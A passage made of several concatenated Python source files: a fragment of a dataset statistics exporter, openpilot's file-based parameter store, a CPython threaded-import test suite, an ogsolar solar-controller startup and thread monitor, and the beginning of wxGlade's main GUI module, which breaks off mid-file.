f_new = im_dir / Path(f).name # dataset-hub image filename
try: # use PIL
im = Image.open(f)
r = max_dim / max(im.height, im.width) # ratio
if r < 1.0: # image too large
im = im.resize((int(im.width * r), int(im.height * r)))
im.save(f_new, 'JPEG', quality=75, optimize=True) # save
except Exception as e: # use OpenCV
print(f'WARNING: HUB ops PIL failure {f}: {e}')
im = cv2.imread(f)
im_height, im_width = im.shape[:2]
r = max_dim / max(im_height, im_width) # ratio
if r < 1.0: # image too large
im = cv2.resize(im, (int(im_width * r), int(im_height * r)), interpolation=cv2.INTER_LINEAR)
cv2.imwrite(str(f_new), im)
zipped, data_dir, yaml_path = unzip(Path(path))
with open(check_yaml(yaml_path), errors='ignore') as f:
data = yaml.safe_load(f) # data dict
if zipped:
data['path'] = data_dir # TODO: should this be dir.resolve()?
check_dataset(data, autodownload) # download dataset if missing
hub_dir = Path(data['path'] + ('-hub' if hub else ''))
stats = {'nc': data['nc'], 'names': data['names']} # statistics dictionary
for split in 'train', 'val', 'test':
if data.get(split) is None:
stats[split] = None # i.e. no test set
continue
x = []
dataset = LoadImagesAndLabels(data[split]) # load dataset
for label in tqdm(dataset.labels, total=dataset.n, desc='Statistics'):
x.append(np.bincount(label[:, 0].astype(int), minlength=data['nc']))
x = np.array(x) # shape(128x80)
stats[split] = {'instance_stats': {'total': int(x.sum()), 'per_class': x.sum(0).tolist()},
'image_stats': {'total': dataset.n, 'unlabelled': int(np.all(x == 0, 1).sum()),
'per_class': (x > 0).sum(0).tolist()},
'labels': [{str(Path(k).name): round_labels(v.tolist())} for k, v in
zip(dataset.img_files, dataset.labels)]}
if hub:
im_dir = hub_dir / 'images'
im_dir.mkdir(parents=True, exist_ok=True)
for _ in tqdm(ThreadPool(NUM_THREADS).imap(hub_ops, dataset.img_files), total=dataset.n, desc='HUB Ops'):
pass
# Profile
stats_path = hub_dir / 'stats.json'
if profile:
for _ in range(1):
file = stats_path.with_suffix('.npy')
t1 = time.time()
np.save(file, stats)
t2 = time.time()
x = np.load(file, allow_pickle=True)
print(f'stats.npy times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
file = stats_path.with_suffix('.json')
t1 = time.time()
with open(file, 'w') as f:
json.dump(stats, f) # save stats *.json
t2 = time.time()
with open(file) as f:
x = json.load(f) # load hyps dict
print(f'stats.json times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
# Save, print and return
if hub:
print(f'Saving {stats_path.resolve()}...')
with open(stats_path, 'w') as f:
json.dump(stats, f) # save stats.json
if verbose:
print(json.dumps(stats, indent=2, sort_keys=False))
return stats
|
params.py
|
#!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file with named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import errno
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
from common.basedir import PARAMS
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.CLEAR_ON_MANAGER_START],
"AthenadPid": [TxType.PERSISTENT],
"CalibrationParams": [TxType.PERSISTENT],
"CarBatteryCapacity": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarParamsCache": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CommunityFeaturesToggle": [TxType.PERSISTENT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"ControlsParams": [TxType.PERSISTENT],
"DisablePowerDown": [TxType.PERSISTENT],
"DisableUpdates": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsDriverViewEnabled": [TxType.CLEAR_ON_MANAGER_START],
"IsLdwEnabled": [TxType.PERSISTENT],
"IsGeofenceEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsOffroad": [TxType.CLEAR_ON_MANAGER_START],
"IsRHD": [TxType.PERSISTENT],
"IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"IsUpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"LastAthenaPingTime": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LastUpdateException": [TxType.PERSISTENT],
"LimitSetSpeed": [TxType.PERSISTENT],
"LimitSetSpeedNeural": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"LongitudinalControl": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"LaneChangeEnabled": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaFirmwareHex": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SpeedLimitOffset": [TxType.PERSISTENT],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"UpdateFailedCount": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_NeosUpdate": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_UpdateFailed": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create):
self._path = path
self._create = create
self._fd = None
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
if self._vals is None:
return None
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create):
lock = FileLock(os.path.join(self._path, ".lock"), create)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False)
    except OSError as e:
      # Do not create lock if it does not exist.
      if e.errno == errno.ENOENT:
        self._vals = {}
        return self
      raise  # re-raise other errors; otherwise `lock` below would be unbound
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, exc_type, exc_value, traceback):
pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True)
self._vals = self._read_values_locked()
except Exception:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, exc_type, exc_value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path + "/.lock", True)
lock.acquire()
try:
tmp_path = tempfile.NamedTemporaryFile(mode="wb", prefix=".tmp", dir=params_path, delete=False)
with tmp_path as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
os.chmod(tmp_path.name, 0o666)
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path.name, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db=PARAMS):
self.db = db
# create the database if it doesn't exist...
if not os.path.exists(self.db + "/d"):
with self.transaction(write=True):
pass
def clear_all(self):
shutil.rmtree(self.db, ignore_errors=True)
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
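# Minimal usage sketch (not part of the original module): everyday callers use the Params wrapper
# above rather than the low-level read_db/write_db helpers; put() blocks until the value is fsynced
# while put_nonblocking() hands the write to a background thread. The key names exist in the `keys`
# table above; the surrounding function is illustrative only and never called.
def _demo_params_usage():
  params = Params()                                    # opens (or creates) the store at PARAMS
  params.put("DongleId", "0123456789abcdef")           # blocking write: lock, temp file, atomic rename
  dongle_id = params.get("DongleId", encoding='utf8')  # plain read of <params_dir>/d/DongleId
  put_nonblocking("IsMetric", "1")                     # fire-and-forget write on a worker thread
  return dongle_id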
|
test_threaded_import.py
|
# This is a variant of the very old (early 90's) file
# Demo/threads/bug.py. It simply provokes a number of threads into
# trying to import the same module "at the same time".
# There are no pleasant failure modes -- most likely is that Python
# complains several times about module random having no attribute
# randrange, and then Python hangs.
import os
import imp
import sys
import time
import shutil
import unittest
from test.support import verbose, import_module, run_unittest, TESTFN
thread = import_module('_thread')
threading = import_module('threading')
def task(N, done, done_tasks, errors):
try:
# We don't use modulefinder but still import it in order to stress
# importing of different modules from several threads.
if len(done_tasks) % 2:
import modulefinder
import random
else:
import random
import modulefinder
# This will fail if random is not completely initialized
x = random.randrange(1, 3)
except Exception as e:
errors.append(e.with_traceback(None))
finally:
done_tasks.append(thread.get_ident())
finished = len(done_tasks) == N
if finished:
done.set()
# Create a circular import structure: A -> C -> B -> D -> A
# NOTE: `time` is already loaded and therefore doesn't threaten to deadlock.
circular_imports_modules = {
'A': """if 1:
import time
time.sleep(%(delay)s)
x = 'a'
import C
""",
'B': """if 1:
import time
time.sleep(%(delay)s)
x = 'b'
import D
""",
'C': """import B""",
'D': """import A""",
}
class Finder:
"""A dummy finder to detect concurrent access to its find_module()
method."""
def __init__(self):
self.numcalls = 0
self.x = 0
self.lock = thread.allocate_lock()
def find_module(self, name, path=None):
# Simulate some thread-unsafe behaviour. If calls to find_module()
# are properly serialized, `x` will end up the same as `numcalls`.
# Otherwise not.
with self.lock:
self.numcalls += 1
x = self.x
time.sleep(0.1)
self.x = x + 1
class FlushingFinder:
"""A dummy finder which flushes sys.path_importer_cache when it gets
called."""
def find_module(self, name, path=None):
sys.path_importer_cache.clear()
class ThreadedImportTests(unittest.TestCase):
def setUp(self):
self.old_random = sys.modules.pop('random', None)
def tearDown(self):
# If the `random` module was already initialized, we restore the
# old module at the end so that pickling tests don't fail.
# See http://bugs.python.org/issue3657#msg110461
if self.old_random is not None:
sys.modules['random'] = self.old_random
def check_parallel_module_init(self):
if imp.lock_held():
# This triggers on, e.g., from test import autotest.
raise unittest.SkipTest("can't run when import lock is held")
done = threading.Event()
for N in (20, 50) * 3:
if verbose:
print("Trying", N, "threads ...", end=' ')
# Make sure that random and modulefinder get reimported freshly
for modname in ['random', 'modulefinder']:
try:
del sys.modules[modname]
except KeyError:
pass
errors = []
done_tasks = []
done.clear()
for i in range(N):
thread.start_new_thread(task, (N, done, done_tasks, errors,))
done.wait(60)
self.assertFalse(errors)
if verbose:
print("OK.")
def test_parallel_module_init(self):
self.check_parallel_module_init()
def test_parallel_meta_path(self):
finder = Finder()
sys.meta_path.append(finder)
try:
self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(finder)
def test_parallel_path_hooks(self):
# Here the Finder instance is only used to check concurrent calls
# to path_hook().
finder = Finder()
# In order for our path hook to be called at each import, we need
# to flush the path_importer_cache, which we do by registering a
# dedicated meta_path entry.
flushing_finder = FlushingFinder()
def path_hook(path):
finder.find_module('')
raise ImportError
sys.path_hooks.append(path_hook)
sys.meta_path.append(flushing_finder)
try:
# Flush the cache a first time
flushing_finder.find_module('')
numtests = self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(flushing_finder)
sys.path_hooks.remove(path_hook)
def test_import_hangers(self):
# In case this test is run again, make sure the helper module
# gets loaded from scratch again.
try:
del sys.modules['test.threaded_import_hangers']
except KeyError:
pass
import test.threaded_import_hangers
self.assertFalse(test.threaded_import_hangers.errors)
def test_circular_imports(self):
# The goal of this test is to exercise implementations of the import
# lock which use a per-module lock, rather than a global lock.
# In these implementations, there is a possible deadlock with
# circular imports, for example:
# - thread 1 imports A (grabbing the lock for A) which imports B
# - thread 2 imports B (grabbing the lock for B) which imports A
# Such implementations should be able to detect such situations and
# resolve them one way or the other, without freezing.
# NOTE: our test constructs a slightly less trivial import cycle,
# in order to better stress the deadlock avoidance mechanism.
delay = 0.5
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
for name, contents in circular_imports_modules.items():
contents = contents % {'delay': delay}
with open(os.path.join(TESTFN, name + ".py"), "wb") as f:
f.write(contents.encode('utf-8'))
self.addCleanup(sys.modules.pop, name, None)
results = []
def import_ab():
import A
results.append(getattr(A, 'x', None))
def import_ba():
import B
results.append(getattr(B, 'x', None))
t1 = threading.Thread(target=import_ab)
t2 = threading.Thread(target=import_ba)
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(set(results), {'a', 'b'})
def test_main():
run_unittest(ThreadedImportTests)
if __name__ == "__main__":
test_main()
|
startup_controller.py
|
#!/usr/bin/env python
import sys
import traceback
from threading import Thread, active_count
from time import sleep, time
from subprocess import call
from p3lib.conduit import Conduit
from ogsolar.libs.ogsolar_controller import OGSolarController
from ogsolar.libs.epsolar_tracer import EPSolarTracerInterface
from ogsolar.libs.yview_client import YViewClient
from ogsolar.libs.httpjsontranslator import HttpJsonTranslator
from ogsolar.libs.json_pusher import JsonPusher
from ogsolar.libs.app_config import AppConfig
from ogsolar.libs.web_server import WebServer
from ogsolar.libs.yview_client import AYTListener
class StartupController(object):
"""@brief Responsible for starting all the threads that compose the ogsolar system."""
MIN_RUNNING_THREAD_COUNT = 8
MAX_MEM_INCREASE_KB = 10000
REBOOT_CMD = "/sbin/reboot"
CONDUIT_READ_TIMEOUT_SECONDS = 30
@staticmethod
def RunThread(uio, method):
"""@brief Responsible for running a thread method and if it stops then report any exceptions."""
try:
method()
except:
traceback.print_exc(file=sys.stdout)
#Report the error so that it can be seen via syslog
uio.errorException()
uio.error("%s method exited." % ( str(method) ) )
def __init__(self, uio, options, appConfig):
"""@brief Constructor."""
self._uio = uio
self._options = options
self._appConfig = appConfig
def run(self):
conduitUIO = None
if self._options.debug:
conduitUIO = self._uio
self._traceConduit = Conduit(uio=conduitUIO, cName="tracer", readBlockTimeoutSeconds=StartupController.CONDUIT_READ_TIMEOUT_SECONDS)
self._epSolarTracerInterface = EPSolarTracerInterface(self._uio, self._options, self._appConfig, self._traceConduit)
epSolarTracerReaderThread = Thread(target=StartupController.RunThread, args=(self._uio, self._epSolarTracerInterface.run,) )
epSolarTracerReaderThread.setDaemon(True)
epSolarTracerReaderThread.start()
self._yViewConduit = Conduit(uio=conduitUIO, cName="yView", readBlockTimeoutSeconds=StartupController.CONDUIT_READ_TIMEOUT_SECONDS)
self._yViewClient = YViewClient(self._uio, self._options, self._appConfig, self._yViewConduit)
yViewClientThread = Thread(target=StartupController.RunThread, args=(self._uio, self._yViewClient.run,) )
yViewClientThread.setDaemon(True)
yViewClientThread.start()
self._webConduit = Conduit(uio=conduitUIO, cName="web", readBlockTimeoutSeconds=StartupController.CONDUIT_READ_TIMEOUT_SECONDS)
self._httpJsonTranslator = HttpJsonTranslator(self._uio, self._options, self._webConduit)
httpJsonTranslatorThread = Thread(target=StartupController.RunThread, args=(self._uio, self._httpJsonTranslator.run,) )
httpJsonTranslatorThread.setDaemon(True)
httpJsonTranslatorThread.start()
self._jsonPusherConduit = Conduit(uio=conduitUIO, cName="json", readBlockTimeoutSeconds=StartupController.CONDUIT_READ_TIMEOUT_SECONDS)
self._jsonPusher = JsonPusher(self._uio, self._options, self._jsonPusherConduit)
jsonPusherThread = Thread(target=StartupController.RunThread, args=(self._uio, self._jsonPusher.run,) )
jsonPusherThread.setDaemon(True)
jsonPusherThread.start()
webServerThread = WebServer(self._options.web_root)
webServerThread.setPort(AYTListener.WEB_SERVER_PORT)
webServerThread.setUIO(self._uio)
webServerThread.setDaemon(True)
webServerThread.start()
self._oGSolarController = OGSolarController(self._uio, self._options, self._appConfig, self._traceConduit, self._yViewConduit, self._webConduit, self._jsonPusherConduit)
#This thread has to shutdown in a controlled fashion and so is not a daemon thread.
oGSolarControllerThread = Thread(target=StartupController.RunThread, args=(self._uio, self._oGSolarController.run,) )
#oGSolarControllerThread.setDaemon(True)
oGSolarControllerThread.start()
#Block here
self._threadMonitor()
def _shutDown(self):
"""@brief Shutdown the solar controller system."""
rebootDelay = self._appConfig.getAttr(AppConfig.DELAY_BEFORE_ERROR_REBOOT)
self._uio.info("Starting shutdown.")
self._oGSolarController.shutDown()
self._uio.info("SHUTDOWN:")
if not self._options.no_reboot:
self._uio.info("SHUTDOWN: rebooting in %d seconds." % (rebootDelay) )
# Provide details on how long before restart, useful in syslog.
rebootTime=time()+rebootDelay
while time() < rebootTime:
self._uio.warn("%d seconds before reboot." % (rebootTime-time()) )
sleep(2)
self._reboot()
def _reboot(self):
"""@brief reboot the Linux platform."""
self._uio.info("REBOOT: NOW !!!")
call([StartupController.REBOOT_CMD])
def _threadMonitor(self, pollSeconds=5):
"""@brief Monitor all running threads and if one stops exit the main thread.
Exiting the main thread will shutdown all other threads as they are all daemon threads."""
#Sleep to allow all threads to start
sleep(pollSeconds)
threadCount = active_count()
self._uio.info("STARTUP: %d threads running" % (threadCount) )
initialMemUsedKB = OGSolarController.GetMemUsage()
try:
try:
while True:
memUsedKb = OGSolarController.GetMemUsage()
memIncreaseKB = memUsedKb-initialMemUsedKB
threadCount = active_count()
self._uio.info("%d threads running (min=%d)." % (threadCount, StartupController.MIN_RUNNING_THREAD_COUNT) )
self._uio.info("Memory in use = %d kB, increase since startup = %d kB (max = %d kB)." % (memUsedKb, memIncreaseKB, self._options.max_mem_inc) )
ctrlErrMsg = self._oGSolarController.getErrorMessage()
if threadCount < StartupController.MIN_RUNNING_THREAD_COUNT:
self._uio.error("THREAD ERROR: Not all threads are running.")
break
elif memIncreaseKB > self._options.max_mem_inc:
self._uio.error("MEMORY ERROR: To much memory is now being used.")
break
elif ctrlErrMsg:
self._uio.error("OGSOLAR_CONTROLLER: %s" % (ctrlErrMsg) )
break
else:
sleep(pollSeconds)
except KeyboardInterrupt:
self._uio.error("SHUTDOWN: User pressed CTRL C")
finally:
self._shutDown()
|
main.py
|
"""\
Main wxGlade module: defines wxGladeFrame which contains the buttons to add
widgets and initializes all the stuff (tree, frame_property, etc.)
@copyright: 2002-2007 Alberto Griggio
@copyright: 2011-2016 Carsten Grohmann
@copyright: 2016-2021 Dietmar Schwertberger
@license: MIT (see LICENSE.txt) - THIS PROGRAM COMES WITH NO WARRANTY
"""
# import general python modules
import logging, os, os.path, sys, math, time, functools
import wx
from xml.sax import SAXParseException
# import project modules
import application
import common, config, compat, misc, history
import new_properties as np
import preferencesdialog, msgdialog, bugdialog, about
import log
import template
from tree import WidgetTree
from xml_parse import XmlWidgetBuilder, ProgressXmlWidgetBuilder, XmlParsingError
class FileDropTarget(wx.FileDropTarget):
# file drop target that checks first whether the property panel is the target
def __init__(self, parent):
wx.FileDropTarget.__init__(self)
self.parent = parent
if config.debugging:
def OnDragOver(self, x, y, defResult):
x0,y0 = self.parent.GetClientAreaOrigin()
screen_xy = self.parent.ClientToScreen( (x-x0,y-y0) )
ctrl = wx.FindWindowAtPoint( screen_xy )
print("DragOver", x0,y0, x-x0,y-y0, ctrl)
return wx.FileDropTarget.OnDragOver(self, x,y, defResult)
def OnDropFiles(self, x, y, filenames):
if len(filenames) > 1:
wx.MessageBox( _("Please only drop one file at a time"), "wxGlade", wx.ICON_ERROR )
return False
if not filenames or not os.path.exists(filenames[0]): return False
# find control under drop point; this does also work if a dialog is open
x0,y0 = self.parent.GetClientAreaOrigin()
screen_xy = self.parent.ClientToScreen( (x-x0,y-y0) )
ctrl = c = wx.FindWindowAtPoint( screen_xy )
# go up the hierarchy and find a widget with an 'on_drop_files' method
while c:
if hasattr(c, "on_drop_files"):
handled = c.on_drop_files(screen_xy, ctrl, filenames)
if handled: return True
if c is self.parent.property_panel: break
if isinstance(c, wx.Dialog): return False # when a dialog is open, don't open wxg or xrc files
c = c.GetParent()
# not handled by a control; try to open .wxg or .XRC file
if not self.parent.ask_save(): return False
path = filenames[0]
if os.path.splitext(path)[1].upper() == ".XRC":
self.parent.import_xrc(path, ask_save=False)
else:
self.parent._open_app(path)
self.parent.cur_dir = os.path.dirname(path)
return True
class wxGladePropertyPanel(wx.Panel):
"Panel used to display the Properties of the various widgets"
def __init__(self, parent):
wx.Panel.__init__( self, parent, -1, name='PropertyPanel' )
self.SetBackgroundColour( compat.wx_SystemSettings_GetColour(wx.SYS_COLOUR_BTNFACE) )
self.current_widget = None # instance currently being edited
self.next_widget = None # the next one, will only be edited after a small delay
self.pagenames = None
sizer = wx.BoxSizer(wx.VERTICAL)
self.heading = wx.TextCtrl(self, style=wx.TE_READONLY)
sizer.Add(self.heading, 0, wx.EXPAND, 0)
self.notebook = wx.Notebook(self)
self.notebook.Bind(wx.EVT_SIZE, self.on_notebook_size)
sizer.Add(self.notebook, 1, wx.EXPAND, 0)
# for GTK3: add a panel to determine page size
p = wx.Panel(self.notebook)
self.notebook.AddPage(p, "panel")
self._notebook_decoration_size = None
p.Bind(wx.EVT_SIZE, self.on_panel_size)
self.SetSizer(sizer)
self.Layout()
def on_drop_files(self, screen_xy, ctrl, filenames):
if not self.current_widget: return False
for p_name in self.current_widget.PROPERTIES:
if p_name[0].isupper(): continue
prop = self.current_widget.properties.get(p_name)
if not prop or not hasattr(prop, "on_drop_file"): continue
if ( hasattr(prop, "label_ctrl") and prop.label_ctrl.ScreenRect.Contains( screen_xy ) and
prop.label_ctrl.IsShownOnScreen() ) or prop.has_control(ctrl):
return prop.on_drop_file(filenames[0])
return False
####################################################################################################################
# new editor interface
def set_widget(self, widget, force=False):
if widget is self.current_widget and not force:
# just update
return
self.next_widget = widget
if self.current_widget:
# this might not be executed if there was an error during creation of the property editors
for editor in self.current_widget.properties.values():
editor.destroy_editor()
self.current_widget = None # delete the reference
wx.CallLater( 150, self.edit_properties, widget )
def edit_properties(self, edit_widget):
# this will be called with a delay
if edit_widget is not self.next_widget:
# wait for another call...
return
if self._notebook_decoration_size is None:
# try again later
wx.CallLater( 150, self.edit_properties, edit_widget )
return
self.current_widget = None
self.create_editor(edit_widget)
# this code might not be reached in case of an error
self.current_widget = edit_widget
if edit_widget:
# XXX set status bar
klass = edit_widget.get_prop_value("class", edit_widget.WX_CLASS)
self.heading.SetValue( _('Properties - %s - <%s>:') % (klass, edit_widget.name) )
else:
self.heading.SetValue( _('Properties') )
def create_editor(self, edit_widget):
# fill the frame with a notebook of property editors
if not self.notebook: return # already deleted
self.current_widget_class = edit_widget.__class__
if wx.Platform != "__WXMSW__" :
focus_before = self.FindFocus()
self.notebook.Hide()
# remember the notebook page to be selected
selection = self.notebook.GetSelection()
select_page = self.pagenames[selection] if selection!=-1 else None
# clear notebook pages
#self.notebook.DeleteAllPages() # deletes also the windows on the pages
while self.notebook.PageCount:
print("DELETE PAGE; new widget:", edit_widget)
self.notebook.DeletePage(self.notebook.PageCount-1)
self.pagenames = pagenames = []
self.sizers = []
if not edit_widget: return
current_page = current_sizer = current_pagename = None
property_instance = None
for prop in edit_widget.PROPERTIES:
if prop[0].isupper():
# end previous page
if current_page is not None:
self.end_page(current_page, current_sizer, current_pagename)
current_page = None
# start new page
current_pagename = prop
if prop=="Layout" and not edit_widget._has_layout:continue
if prop=="Events" and edit_widget.events is None: continue
current_page = self.start_page(prop)
current_sizer = wx.BoxSizer(wx.VERTICAL)
self.sizers.append(current_sizer)
self.pagenames.append(prop)
continue
if current_pagename=="Layout" and not edit_widget._has_layout: continue
# a property or None
property_instance_ = edit_widget.properties.get(prop)
if property_instance_ is not None:
property_instance = property_instance_
property_instance.create_editor(current_page, current_sizer)
if current_page is not None:
self.end_page(current_page, current_sizer, current_pagename)
if select_page and select_page in pagenames:
index = pagenames.index(select_page)
self.notebook.SetSelection(index)
else:
self.notebook.SetSelection(0)
self.notebook.Show()
if wx.Platform != "__WXMSW__" and focus_before is common.app_tree:
focus_before.SetFocus()
def start_page(self, name):
